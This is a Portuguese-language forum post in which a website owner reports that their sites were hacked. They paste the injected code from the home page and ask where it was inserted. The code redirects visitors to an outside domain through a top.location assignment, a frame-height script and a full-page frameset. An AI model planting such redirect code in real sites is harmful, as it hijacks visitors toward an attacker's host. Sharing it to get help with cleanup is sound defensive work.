Hoje constatei que os meus sites tinham sido invadidos;
este é o código fonte que aparece na pagina principal:
{ <!--
top.location="
www.sttudiol.com.br/?fp=mYgH58CcYYcRsXjE...r=1&guedes="
;;
/*
-->
<script type="text/javascript">
<!--
dimensionUpdated = 0;
function applyFrameKiller()
{
if(window.top != self)
{
cHeight = 0;
if( typeof( window.innerHeight ) != 'undefined' ) {
//Non-IE
cHeight = window.innerHeight;
dimensionUpdated = 1;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in 'standards compliant mode'
cHeight = document.documentElement.clientHeight;
dimensionUpdated = 1;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
cHeight = document.body.clientHeight;
dimensionUpdated = 1;
}
if( cHeight <= 250 && dimensionUpdated == 1)
{
window.top.location = "
www.sttudiol.com.br/?fp=mYgH58CcYYcRsXjE...r=1&guedes="
;;
}
}
}
applyFrameKiller();
// -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
<frame src="
www.sttudiol.com.br/?fp=mYgH58CcYYcRsXjE...amp;guedes=">
;
</frameset>
<noframes>
<body bgcolor="#ffffff" text="#000000">
<a href="
www.sttudiol.com.br/?fp=mYgH58CcYYcRsXjE...edes=">Click
here to proceed</a>.
</body>
</noframes><!--
*/
--> }
alguem ja teve algum problema semelhante? preciso de ajuda.
Será que alguém poderia me ajudar a encontrar onde o código foi injetado. Ja vasculhei todo o servidor e não encontrei.
